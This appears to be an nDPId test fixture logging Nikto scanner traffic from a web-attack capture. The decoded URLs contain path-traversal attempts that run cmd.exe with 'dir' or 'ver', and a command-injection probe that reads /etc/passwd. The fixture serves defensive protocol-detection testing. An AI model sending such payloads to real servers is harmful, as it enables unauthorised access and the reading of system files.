-01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7440000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003218)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_packet_id":1,"flow_last_seen":1576420277889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277889,"pkt":"AAAAAAAAAAAAAAAACABFAADTtGFAAEAGh8F\/AAABfwAAAcdkH5BoGo0gUvgPHYAYAED+xwAAAQEICp1m\/6mdZv+pR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWRpciUyMGM6XFwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003219)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_packet_id":1,"flow_last_seen":1576420277890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277890,"pkt":"AAAAAAAAAAAAAAAACABFAADHrzRAAEAGjPp\/AAABfwAAAcdmH5C4mZZz5s98MYAYAED+uwAAAQEICp1m\/6qdZv+qR0VUIC9pc2FwaS90c3Rpc2FwaS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI2MykNCg0K"} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/isapi\/tstisapi.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003263)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_packet_id":1,"flow_last_seen":1576420277892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277892,"pkt":"AAAAAAAAAAAAAAAACABFAADhOMJAAEAGA1N\/AAABfwAAAcdoH5DDTQGCjXG7iYAYAED+1QAAAQEICp1m\/6ydZv+sR0VUIC9jZXJ0c3J2Ly4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5NCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01094{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003294)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1576420277893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1576420277893,"pkt":"AAAAAAAAAAAAAAAACABFAADvSZpAAEAG8mx\/AAABfwAAAcdqH5B\/BnDaXNCp24AYAED+4wAAAQEICp1m\/62dZv+tR0VUIC9jZ2ktYmluLy4uJTI1NWMuLiUyNTVjLi4lMjU1Y3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk1KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01108{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003295)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277895,"pkt":"AAAAAAAAAAAAAAAACABFAADqfTRAAEAGvtd\/AAABfwAAAcdsH5BhnER0\/MAlIYAYAED+3gAAAQEICp1m\/6+dZv+vR0VUIC9paXNhZG1wd2QvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01103{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003296)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":258,"pkt_l4_len":224,"thread_ts_msec":1576420277896,"pkt":"AAAAAAAAAAAAAAAACABFAAD0gMpAAEAGuzd\/AAABfwAAAcduH5Bs5rmLXk\/vk4AYAED+6AAAAQEICp1m\/7CdZv+wR0VUIC9tc2FkYy8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003297)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277898,"pkt":"AAAAAAAAAAAAAAAACABFAADwDYtAAEAGLnt\/AAABfwAAAcdwH5DXOjTMIaH3HYAYAED+5AAAAQEICp1m\/7GdZv+xR0VUIC9wYnNlcnZlci8uLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003298)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_packet_id":1,"flow_last_seen":1576420277899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277899,"pkt":"AAAAAAAAAAAAAAAACABFAADkYvBAAEAG2SF\/AAABfwAAAcdyH5AooFut2XrcJYAYAED+2AAAAQEICp1m\/7OdZv+zR0VUIC9ycGMvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01097{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003299)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_packet_id":1,"flow_last_seen":1576420277901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277901,"pkt":"AAAAAAAAAAAAAAAACABFAADogDVAAEAGu9h\/AAABfwAAAcd0H5COI7lxOfsaCoAYAED+3AAAAQEICp1m\/7WdZv+1R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003300)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_packet_id":1,"flow_last_seen":1576420277902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277902,"pkt":"AAAAAAAAAAAAAAAACABFAADos7FAAEAGiFx\/AAABfwAAAcd2H5DBqortDeq7IYAYAED+3AAAAQEICp1m\/7adZv+2R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYyt2ZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+ver","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003301)"}} 